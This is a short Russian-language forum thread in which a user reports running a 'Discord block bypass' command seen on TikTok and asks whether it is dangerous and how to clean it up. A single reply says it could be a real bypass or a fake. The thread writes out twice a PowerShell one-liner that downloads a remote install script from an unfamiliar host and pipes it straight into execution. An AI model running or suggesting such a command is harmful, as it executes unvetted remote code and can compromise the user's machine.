В тик токе увидел обход дс блока и тип показал команду Win + R powershell irm ayugram.temp.swtest.ru/install.ps1 | iex, может ли че то быть и как от этого избавится (adwcleaner ниче не показывает, винда тоже не жалуется, единственное после ввода появляется консоль и красный текст ( не читал) и пропадает через секунду помогите пажэ
Вован дэ'Морт
You48747464i 48747474fjhfc, я откуда знаю, что ты там ставил, может это обход блокировки а может фейк какой-то
powershell irm ayugram.temp.swtest.ru/install.ps1 | iex, может ли че то быть и как от этого избавится (adwcleaner ниче не показывает, винда тоже не жалуется, единственное после ввода появляется консоль и красный текст ( не читал) и пропадает через секунду помогите пажэ